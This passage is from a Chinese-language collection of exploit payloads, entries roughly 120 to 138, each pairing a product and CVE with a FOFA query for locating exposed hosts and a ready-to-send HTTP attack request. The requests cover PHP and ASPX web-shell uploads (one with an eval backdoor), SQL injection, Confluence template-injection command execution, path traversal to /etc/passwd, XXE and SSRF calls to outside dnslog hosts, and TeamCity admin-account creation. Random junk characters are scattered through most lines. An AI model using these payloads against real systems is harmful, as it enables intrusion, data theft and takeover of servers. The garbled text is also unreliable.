' I" F9 x; I& i8 y2 V& kOrigin: https://58.18.133.60:8443. A( w. [# J. j& C7 ?
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
2 r% F2 D! P1 X ]& d+ ]0 m) K5 W8 D8 ~* eSec-Fetch-Dest: empty
% Q/ }, {8 ]% H9 o% | [7 MSec-Fetch-Mode: cors
( g. O0 o# ]' T4 t" A# ?Sec-Fetch-Site: same-origin, p; y' g6 s x4 @
X-Forwarded-For: 1.1.1.1
6 V2 h. k7 w7 w! u' L7 \X-Originating-Ip: 1.1.1.16 \; E& \' e* U! U; P9 w
X-Remote-Ip: 1.1.1.1: Q; a8 ~3 G! G M1 x9 S# G
X-Remote-Addr: 1.1.1.1
8 C u+ ?$ ~: f7 ]. r' PTe: trailers P8 D! [" ~) y& [! K: g5 u
Connection: close
& Y8 ~4 i7 K1 e
* a" A9 X) h& K" q3 Gsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|1234560 e0 y% q+ V: P9 \3 P V1 d& \
' h( q2 [8 E. f2 D1 ]1 V
8 C: s7 a2 z: S/ i. V3 A120. 北京百绰智能S40管理平台导入web.php任意文件上传
, ^2 u" k2 U/ w' V5 G3 DCVE-2024-1253
9 ?1 d/ [: e5 c) G$ L/ q- [FOFA:title="Smart管理平台"
3 w6 x) P+ q, }- LPOST /useratte/web.php? HTTP/1.10 O$ W# D ^5 [) a$ j* l- P
Host: ip:port
: a, F- i/ R' D2 O, z9 ^' ~8 m7 q) FCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
: {) Q4 T b# M7 xUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
% f3 l K1 W0 A# OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- {1 w4 }5 z; y: w% }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! w" x$ y0 O2 ]( F- y" L1 Y! oAccept-Encoding: gzip, deflate
r7 }/ m. c4 x2 S# j" WContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
, p& T$ s% }0 f# ~Content-Length: 597
+ [8 ~& P |0 I" Q( r7 W) Q0 m' }! oOrigin: https://ip:port7 c, p2 r3 ?* A# o
Referer: https://ip:port/sysmanage/licence.php
) d9 C; q* }; V, f: z* e( NUpgrade-Insecure-Requests: 17 s& N5 U) r7 x- {+ S& y
Sec-Fetch-Dest: document' r3 ^* ?% Q& D3 z8 {
Sec-Fetch-Mode: navigate: D, U9 t5 m9 }7 z. L3 y
Sec-Fetch-Site: same-origin
9 m5 |9 ^, ?8 d: _7 O: s* pSec-Fetch-User: ?1 @$ z6 I, X+ i% W- |% M4 N
Te: trailers
, D9 D& z @" FConnection: close0 A$ O) l$ I( p; H+ {9 F
2 h+ C8 k& |" B- `' T2 _-----------------------------42328904123665875270630079328
' ?" f. e" q7 |Content-Disposition: form-data; name="file_upload"; filename="2.php"- [% n' F8 E' [
Content-Type: application/octet-stream: I( Z& z; d% j& d. H
$ r6 J: ~5 W& O9 X9 H# v# w<?php phpinfo()?>
- Z* n! r/ R; F# Y, f: [-----------------------------42328904123665875270630079328
3 ~- }/ t) W. E7 o' Y* \Content-Disposition: form-data; name="id_type"
7 c6 F( Z2 Q/ l; g+ @
\. X% n8 K/ `" \1
. q4 e. p& D: `4 r2 ?; C-----------------------------42328904123665875270630079328
# B4 t3 K/ P; x: h5 @Content-Disposition: form-data; name="1_ck"
, Z) c& F- d7 J* `7 _/ e* ?+ k$ c) a6 ]# r+ c3 G3 {, [
1_radhttp1 Q5 p; c; W. W& M+ g4 t* O
-----------------------------42328904123665875270630079328
, e2 w4 j$ q+ o4 MContent-Disposition: form-data; name="mode"
( Z% }; v5 O. y+ n% ]! D$ D0 M+ o, {8 [$ H2 W% U
import
/ j0 J; c( w+ r% B N-----------------------------423289041236658752706300793289 H+ ?. D. @8 ~4 @5 D! Q% l
. o) u8 u K2 @& y4 u
9 z* j9 J5 l' l文件路径/upload/2.php! h8 h0 X" H8 o5 W. f
- o: ?' I4 s" {6 F; Q
121. 北京百绰智能S42管理平台userattestation.php任意文件上传 T% u( x- Y. O4 \( `% K2 z; w
CVE-2024-19184 ~6 L% v1 _: n$ p" N
FOFA:title="Smart管理平台"
3 Z- E" Q: V+ H/ X, FPOST /useratte/userattestation.php HTTP/1.10 H. R; A% r8 f* m3 u2 o
Host: 192.168.40.130:84433 `, B, `3 _/ m
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac501 n* b6 G( w1 [9 U. i
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
$ V& ^3 P8 G# F* h* m" nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 c3 U9 `( \* J) p/ y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ J- F0 W" @9 b9 {9 y! I6 Q
Accept-Encoding: gzip, deflate
4 ?( F: g' c' M1 m+ f7 TContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328) G2 N o3 d5 E; x) q
Content-Length: 592( V& o& t( H9 ?; l! e n) Y' q
Origin: https://192.168.40.130:84436 L7 o2 a0 ~0 h. g
Upgrade-Insecure-Requests: 1
7 R& `9 |( G3 Q% A5 s& eSec-Fetch-Dest: document
4 _4 N) y& ~6 z! ISec-Fetch-Mode: navigate
% `7 Z: y$ B4 K6 ^9 v- {Sec-Fetch-Site: same-origin
6 a7 P: O# {3 D6 uSec-Fetch-User: ?16 F! O9 e' i! J% G) b% S1 \! N; p5 `4 j
Te: trailers: L- _6 }5 w c
Connection: close
* w- S: G0 m8 O$ U
`2 y- a- C2 x. Q, J) R-----------------------------42328904123665875270630079328/ k; ]% _/ [- G, f3 d: X! a
Content-Disposition: form-data; name="web_img"; filename="1.php"+ U/ n! Z6 J0 ]4 A) h8 [; U9 |
Content-Type: application/octet-stream2 x& g$ c% a; d5 K0 D: |- f
6 A; H& Y7 b; ]' Z: i: @
<?php phpinfo();?>, B9 j& X; n; ^ }0 M* |
-----------------------------42328904123665875270630079328
+ l& `$ Z8 j5 U, i+ W2 eContent-Disposition: form-data; name="id_type"
' r& W" r/ V: {/ c& d
! X* r+ v' n2 q+ y$ W; d& Q( F1
3 A" f* l& a+ Y# b C-----------------------------42328904123665875270630079328$ ^1 S8 b8 o! f! B
Content-Disposition: form-data; name="1_ck"
; ? \0 o! l3 M5 j3 A! V9 \2 S; F* y6 @ u) B3 h) Q' s1 ]& _
1_radhttp
1 J q4 y' d% I: O8 j6 s-----------------------------42328904123665875270630079328
4 Y* e0 D' b9 o9 S) nContent-Disposition: form-data; name="hidwel"
/ O/ L) R6 V' d0 O2 r! Q+ d- M4 z2 A9 \2 \$ p
set
1 t: j+ a% U' {-----------------------------42328904123665875270630079328& A, @ @# D! R: G( D( W+ d( s8 @1 L0 x
! e+ A" P. U% o# j% t- u' Q
* M5 ?2 `5 \ ?; f' \1 f5 Q4 H8 kboot/web/upload/weblogo/1.php
% _ E5 Y# l+ e1 g, _9 a0 R. R( o4 K3 A: T
122. 北京百绰智能s200管理平台/importexport.php sql注入
2 _' g& f; q5 N* L% C F" x8 fCVE-2024-27718FOFA:title="Smart管理平台"
h; a; |8 H3 a V, u: S其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()6 |+ s/ B, ^9 H
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
# ]9 w1 _: f& l# }2 ]# n& AHost: x.x.x.x$ c$ p# D# s; u! ~" o9 [
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0% G3 z/ p0 {$ Z4 T6 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
/ K- [" |5 Q: t" T: OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 V3 B5 m2 X! I; t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 i3 f% |* I3 q6 ^5 b" T9 eAccept-Encoding: gzip, deflate, br+ v0 G8 j7 G7 e0 G! n! i( L
Upgrade-Insecure-Requests: 1
! E; q6 M, B! H' e5 ASec-Fetch-Dest: document
: c ^1 A/ H! c* Q* @ iSec-Fetch-Mode: navigate
" t. |. I' j$ f3 gSec-Fetch-Site: none0 w- D% J& B# V, K% r4 P
Sec-Fetch-User: ?15 r! d3 X$ S; L- D, |8 u
Te: trailers# W6 N! M8 z5 H6 F7 |- h
Connection: close
2 g1 R# i7 j: a6 |3 G7 f% G% [ c L! V- H
1 F6 l8 y+ U5 i: l' t+ ^123. Atlassian Confluence 模板注入代码执行
5 S! T2 W" K' t5 S7 LFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"7 ~- g- B/ \0 r+ A' K5 t' E2 n
POST /template/aui/text-inline.vm HTTP/1.1
! y) X* Y! X( iHost: localhost:8090( ]2 Q8 A& r, A
Accept-Encoding: gzip, deflate, br0 R. ` F X; M) x0 q- c5 ^4 q
Accept: */*: P( @2 s0 i) P8 A9 }$ [' R
Accept-Language: en-US;q=0.9,en;q=0.86 V; A! S' Z2 D* J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.366 q- _# @2 E6 r7 N& _/ w
Connection: close
: K: ~8 `& Y: u+ P. HContent-Type: application/x-www-form-urlencoded/ \0 C$ | M5 |: U
Q4 C# N! t! _# y" A7 H5 g4 {1 E2 Ulabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
. k- ^ A( {" G9 j) _% m5 ]' D' s) `8 l1 H
& r$ n2 N) v* @6 n/ L' b
124. 湖南建研工程质量检测系统任意文件上传5 G: b* q) K; J6 v; U' F
FOFA:body="/Content/Theme/Standard/webSite/login.css"$ L% ?: n. s! Y1 r% R
POST /Scripts/admintool?type=updatefile HTTP/1.1' ^# F# n, @8 B; |
Host: 192.168.40.130:8282
' v6 ^& w# z# F: u9 _8 FUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
& q1 d+ d/ g6 k: ]8 ^Content-Length: 72 G6 K3 i1 |+ j2 `5 M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 b6 @# G% {0 ~2 `
Accept-Encoding: gzip, deflate, br
y% N" q4 ]* M4 HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. x2 n# h; c- R+ i( P9 O; I5 pConnection: close
) M2 E# ?8 d# ^. ?5 OContent-Type: application/x-www-form-urlencoded
9 S" }. s7 H3 ?. A8 r9 z2 l$ S( L
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
5 n% r4 Q8 S( n& X2 N4 h$ u7 G( |9 K+ A1 Q: P9 l
5 e& l; R3 }! O* E4 `+ s, shttp://192.168.40.130:8282/Scripts/abcgcg.aspx( [$ |0 b$ A7 w
% i, R5 X& p* t- ]' T125. ConnectWise ScreenConnect身份验证绕过/ e6 S) T& f1 q0 B
CVE-2024-1709
1 Z2 j2 J& s5 o; A. {FOFA:icon_hash="-82958153"
6 e7 n% ?: L3 E2 E' V' u# Xhttps://github.com/watchtowrlabs ... bypass-add-user-poc# I. u3 j- D5 x( ]: s* f
9 x% n- U" `) j( A
( {: w: L( N5 V1 V9 X使用方法" Y2 m! D0 P" R S+ v
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!" c. R5 _4 _( n! Z5 R7 A9 s: A/ B
" X( C' V( z/ s$ x/ Y
$ Q0 o. r' R9 @/ o1 ]创建好用户后直接登录后台,可以执行系统命令。* o* B& S0 m/ _( s u4 A6 o
1 p+ ^% ?& r( e, K0 E4 P126. Aiohttp 路径遍历 D7 R3 ^) E1 c
FOFA:title=="ComfyUI"
. E6 t7 t# E. M$ lGET /static/../../../../../etc/passwd HTTP/1.10 i& E* P. E, d
Host: x.x.x.x
) D; M5 ^; U$ C; P# jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" A& u9 q* Y& `2 \ |" M
Connection: close7 K# s. G% v, f! I
Accept: */*; i3 M2 R5 d" |9 M
Accept-Language: en
/ D2 B' a5 d3 a& XAccept-Encoding: gzip
5 s: x* k/ d% O8 Z5 S: r2 ~
- k% N# U8 u! ?4 w% |6 B |, N# @- h' V# b( q
127. 广联达Linkworks DataExchange.ashx XXE
3 W+ G; {) Q$ a& [3 k* [FOFA:body="Services/Identification/login.ashx" 4 M) Z$ J3 h) R5 ]# B. f' B+ q9 b
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.17 u5 f8 q/ Y/ {$ O: I
Host: 192.168.40.130:88887 W; F0 X& H& K/ i T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
' C+ w7 s8 l% P% G9 Z) iContent-Length: 4154 s8 u$ G; d6 u) t4 M# S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- l9 ~6 G& O Z* l* M7 n" f* DAccept-Encoding: gzip, deflate
6 |7 G; l% k: d# M( BAccept-Language: zh-CN,zh;q=0.9, o8 i8 n- @& n P+ z4 O0 Y( c
Connection: close3 |) l8 d# F7 h( o) D/ R
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe00 n8 i, W' J: ^* b) W4 j' P9 T
Purpose: prefetch/ h( b/ _9 I7 u9 T0 j9 o% v" Y
Sec-Purpose: prefetch;prerender+ }6 d1 @1 K' S& K* m2 F, i: h
, X" a3 N# |# i: F9 p------WebKitFormBoundaryJGgV5l5ta05yAIe0
/ E Q& b# B9 W6 [7 TContent-Disposition: form-data;name="SystemName": Z7 ~$ P/ J6 ~
( N3 X8 [0 g! Q8 ]: F6 PBIM
0 v7 N! k- {9 m! o------WebKitFormBoundaryJGgV5l5ta05yAIe0
/ ?7 W' B" \9 _# g0 m$ }4 ]Content-Disposition: form-data;name="Params"
7 Q$ d7 _9 e' vContent-Type: text/plain
) ^2 m5 I9 e3 w# i7 Y+ f( W" f+ o
<?xml version="1.0" encoding="UTF-8"?>
' I6 {" z! u9 y5 x<!DOCTYPE test [2 h& k# i" L |; U' N- G" g6 ~
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
% ?' P" y% R% L" M- `) U( w. p, d+ H]& w" ^/ a9 \* W2 H$ t6 L, w8 g. Y9 L
>2 L v4 y5 z; R' V- e
<test>&t;</test>
4 c. J% |$ B- R% r------WebKitFormBoundaryJGgV5l5ta05yAIe0--- f& K1 X7 ?4 I; w; k& K
# P3 s" w" A2 R" Z3 K U* S- M1 `; @, U% Y
; i5 @2 z5 P9 _! o9 Q
128. Adobe ColdFusion 反序列化
0 H6 K' \/ _. pCVE-2023-38203
$ Y: j/ @( k. J# H7 t, r& C5 w8 ]Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)" z7 t3 ]2 X; F+ |* L! r
FOFA:app="Adobe-ColdFusion"
. c4 _! F" Q, V8 s& r' |5 EPAYLOAD
7 R1 {' @8 e: X: W. V) _9 R9 z+ d( G1 O+ L2 D ]# [( U
129. Adobe ColdFusion 任意文件读取" ^# U7 M$ r6 q
CVE-2024-20767
5 Z" f* X' e; b7 w" w8 h `- i7 G! LFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
/ V% \ ~3 Z1 P7 P第一步,获取uuid' w$ H% o8 Z# O0 D2 _/ k# J
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1/ T4 l3 C8 Y3 l! t
Host: x.x.x.x: A4 S& m% d. g( G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 b" a6 z+ C% I" k1 l1 r
Accept: */*9 l, e a, I* K/ y% [
Accept-Encoding: gzip, deflate
& n& }; E1 p& _; O6 @5 C) |Connection: close0 L0 t" V) \( ]* S6 s
+ W' \) O# y: Y, L p; w' P6 b2 Z: c0 d* L5 l( d1 F
第二步,读取/etc/passwd文件
1 t w% B4 |4 E) ]0 J# h tGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1" v& U3 ^( O( t8 J- O/ }
Host: x.x.x.x! ~* ?8 ~1 y- a, u3 W' f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.361 e, o/ e: j- y% R) U; o0 W- ]
Accept: */*
2 Q4 M! f( } ?6 ~0 R% F+ {Accept-Encoding: gzip, deflate
- m! m9 j9 u7 B U& E( I2 lConnection: close' T* B+ C% T. F! k1 K( C5 b, i" w8 l
uuid: 85f60018-a654-4410-a783-f81cbd5000b9" T! {: Z! u+ m: f, f
( Y9 S' Q" |2 S0 n8 v6 N( b/ `
, V+ S0 D5 h+ w0 Y1 x
130. Laykefu客服系统任意文件上传
6 W' T- b; j: t; h) w, tFOFA:icon_hash="-334624619"' A# j' f. v( e) P) V D
POST /admin/users/upavatar.html HTTP/1.1. s+ R5 J; H/ _# B7 f6 @: R! [6 q
Host: 127.0.0.16 H$ B5 K5 \( I! e, v9 R: {
Accept: application/json, text/javascript, */*; q=0.01) q6 v; G6 d+ E6 I; G3 W% {- ]
X-Requested-With: XMLHttpRequest3 a5 m0 ]5 G2 j
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26# U4 `4 y4 s5 }$ L% j0 z0 m
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
, b/ C. {% |, P8 }Accept-Encoding: gzip, deflate, z5 h0 V. J5 m4 v
Accept-Language: zh-CN,zh;q=0.94 F( a2 f4 _7 [1 l5 v
Cookie: user_name=1; user_id=3" R0 c& V5 k+ C8 {
Connection: close5 @. u. C% i* A" l
( |* y. h) @6 n: x4 z
------WebKitFormBoundary3OCVBiwBVsNuB2kR8 ], D) I) K+ C; U6 s& Q( b
Content-Disposition: form-data; name="file"; filename="1.php"
" C1 c) Z8 T9 o+ Z, M! H- T4 eContent-Type: image/png
8 a8 Y! L( B r: ~# U* y$ n7 Y 5 Z2 a' }1 ^- J* Z
<?php phpinfo();@eval($_POST['sec']);?>9 v" ?. q% m1 ^$ Y5 O
------WebKitFormBoundary3OCVBiwBVsNuB2kR--6 e; a6 E, r: _
/ }1 D% J+ p; F
7 s- k4 d0 k+ r( c/ S131. Mini-Tmall <=20231017 SQL注入
0 K! e# r& u. Y# F/ { f6 \% iFOFA:icon_hash="-2087517259"3 a6 J2 e5 Y6 L- C- D0 |
后台地址:http://localhost:8080/tmall/admin* s% y0 p& W3 a) t: }
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)6 X; I1 r+ d8 x
$ r+ [) o7 _0 A# w. {$ t8 k [132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
5 @3 b! X' J) \CVE-2024-27198
2 ^& u o% K4 w0 wFOFA:body="Log in to TeamCity"
; w! Z M- H! {' |6 c! KPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.19 j4 \" u+ A$ `' e
Host: 192.168.40.130:8111, \0 b9 a/ V% A3 H- H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
v) V* l6 B: }) m, u$ `4 DAccept: */*6 r8 m2 b" k; {% S5 D
Content-Type: application/json
( _1 s J( E: `9 AAccept-Encoding: gzip, deflate
) q1 B6 c, ]9 c$ ~, ~( n- T& X, \3 s" x/ |5 R U% A
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}3 R; ^* |; c. A, d
2 O+ t7 a; W5 h. N- H# |; R8 D" |$ d
, B" }7 `2 k6 BCVE-2024-27199
" K4 V. G9 g7 l8 y$ M. n/res/../admin/diagnostic.jsp
- M H; r8 _, ^! Q/.well-known/acme-challenge/../../admin/diagnostic.jsp
& }8 [* `# v* ?. F0 R% O/update/../admin/diagnostic.jsp9 |; m1 D% f$ p. j t. m
5 o. X1 x8 a! V/ t: Q) C
5 f: K. @ P- `# q1 zCVE-2024-27198-RCE.py
- a/ M) }+ h: g( w) R! w; Z; x' k5 e' }# X% P6 O
133. H5 云商城 file.php 文件上传
% z+ @! u1 L( F# R8 w% K8 mFOFA:body="/public/qbsp.php"
8 h* U4 | [- w+ g/ PPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1+ H9 \$ ]9 n2 D' B/ T1 t
Host: your-ip$ W% i! s: \/ y8 ], r0 f" h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
2 v2 g9 e; R5 a) oContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
% p- t1 q- t* I8 k- [- J+ e& u: Y& ?6 g) m
------WebKitFormBoundaryFQqYtrIWb8iBxUCx4 l0 ?- b: ]/ i/ q
Content-Disposition: form-data; name="file"; filename="rce.php"
R& u" i: }$ \Content-Type: application/octet-stream
$ w+ z/ W9 r+ n
$ o0 @* B1 b- U# Q<?php system("cat /etc/passwd");unlink(__FILE__);?>
* Q# Y9 E; \) ~2 h" `5 r: D5 C6 U------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
0 d% Q, x- W, s6 ~
5 Z, r+ D1 q* p: J3 I6 k
' w, E. o( T% p, Q8 G
& X3 m" M! ]; O; b" K9 ~134. 网康NS-ASG应用安全网关index.php sql注入) T# j/ W/ F. y; K( w: F5 q
CVE-2024-2330 i6 \# H9 w2 d
Netentsec NS-ASG Application Security Gateway 6.3版本
/ P' O: M- g7 \1 K+ |9 cFOFA:app="网康科技-NS-ASG安全网关"1 ]6 ?3 ?6 K) B* b8 d2 a
POST /protocol/index.php HTTP/1.10 w" y3 v4 E8 m1 E( f4 P+ \& z
Host: x.x.x.x
: B- F/ H6 Y- J4 h( ]- A3 x& ]: NCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de( x( {8 L& C! G( R& F) N9 ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
$ c- A, ?2 k' a; y/ FAccept: */*
G: J/ K6 I0 R+ G d! @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 ?/ O0 @" L# s" Q$ X! B! C6 s7 ?
Accept-Encoding: gzip, deflate
$ r/ A( n1 _& p' g8 j, l, m7 q( @Sec-Fetch-Dest: empty
% Z) i$ K; G2 m3 G7 xSec-Fetch-Mode: cors9 } `$ M" b' _+ }; f. G$ _% k
Sec-Fetch-Site: same-origin5 c4 e: S9 L; N6 V
Te: trailers
0 P0 m1 c; R# X1 fConnection: close
, p* t0 f: I) _( P, CContent-Type: application/x-www-form-urlencoded
% S6 y% D4 b6 n$ ~5 jContent-Length: 263
) \0 q" V9 K5 b5 Z" ]+ x
# Z. q2 L' J& R0 y7 gjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}2 d4 R( ~, g, t0 ?* A
8 ^4 A) R( d _6 O1 G
) q- l. E" R- K. m135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
9 c. X# [ {7 P/ b$ E1 g3 ~CVE-2024-2022
$ G+ G1 ?# }8 ^$ zNetentsec NS-ASG Application Security Gateway 6.3版本; p- w1 B4 h. r
FOFA:app="网康科技-NS-ASG安全网关"' T# y4 {) O& h7 p; ]- F
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
' n/ H; M, m$ AHost: x.x.x.x+ B. T& M ?6 e1 v+ n% T2 k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
4 j8 v* w" |, `% M5 y2 uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) a' I5 c1 d: k& y/ r S+ e
Accept-Encoding: gzip, deflate
, K4 o0 L- a) v8 l/ C* u! H' E9 {Accept-Language: zh-CN,zh;q=0.98 B6 g1 x+ q/ y( j( o/ e
Connection: close' J8 U3 n( }: H+ S2 C
5 U) ^1 j" U1 N8 `+ d! n9 E
3 C' w1 i: R/ i+ H' |
136. NextChat cors SSRF! T* g; w) }7 T2 c4 D" M
CVE-2023-49785
0 W6 o) E2 S& i/ F6 b6 vFOFA:title="NextChat"1 a7 X' f, h! B7 a/ i# c
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.19 N" @3 [& F& X6 B
Host: x.x.x.x:10000# K( Y/ s; W% |( H( b' ?7 `
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
( Y8 p; d: ~$ G* r3 HConnection: close' g4 d; N7 g' W- z
Accept: */*
2 {# T- D" i& E1 K0 x* NAccept-Language: en
* z7 K1 Q# V: |, aAccept-Encoding: gzip
- M2 M. F8 ~& g3 }: q; K; k
8 G. N$ h j7 N% @0 K g1 l8 d6 X8 u5 |% F K( \: z
137. 福建科立迅通信指挥调度平台down_file.php sql注入* ]8 V: T5 Z" m8 ~4 p$ K! K/ w
CVE-2024-2620
0 Q' d y# H# {4 ]; KFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"% X3 e/ \7 p% D$ N! K C
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1% ^$ j7 T) y, p$ d9 \
Host: x.x.x.x5 v. T- `8 h# a2 h5 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
% ]) L7 `3 o! E$ i0 IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 e/ x& r8 E2 L+ P4 `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% N$ u: e5 v! K3 }7 w5 \Accept-Encoding: gzip, deflate, br" l8 j3 _, P# E9 D$ O2 b
Connection: close
) d2 _" g/ P, \% tCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
2 d- s( N$ q9 F& r+ s$ R4 aUpgrade-Insecure-Requests: 14 G# C9 C8 s8 ?' T
, q$ Q: Y: B% @: M
* T) y( U7 n! `- a3 l! p: }138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
7 z8 M* u: K2 Z% h* X4 F- Y: b- f* WCVE-2024-26212 N1 \. A- Q( D* z3 N" E y+ L
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台") n" U8 O- I$ X4 C* ]
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1' c6 p' x4 I, q: l4 m
Host: x.x.x.x$ h; G/ `, E' p* [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
2 L& @$ j! V' w, ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) o, y4 Q5 O5 u5 J! ?2 l
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. _9 Q# q4 O% o# ]Accept-Encoding: gzip, deflate, br5 x/ M& p! `$ g9 T
Connection: close' d. G6 K, R" o6 x; C& u. p% }
Upgrade-Insecure-Requests: 1' Q( n' `2 \0 i9 n' I( ?- n
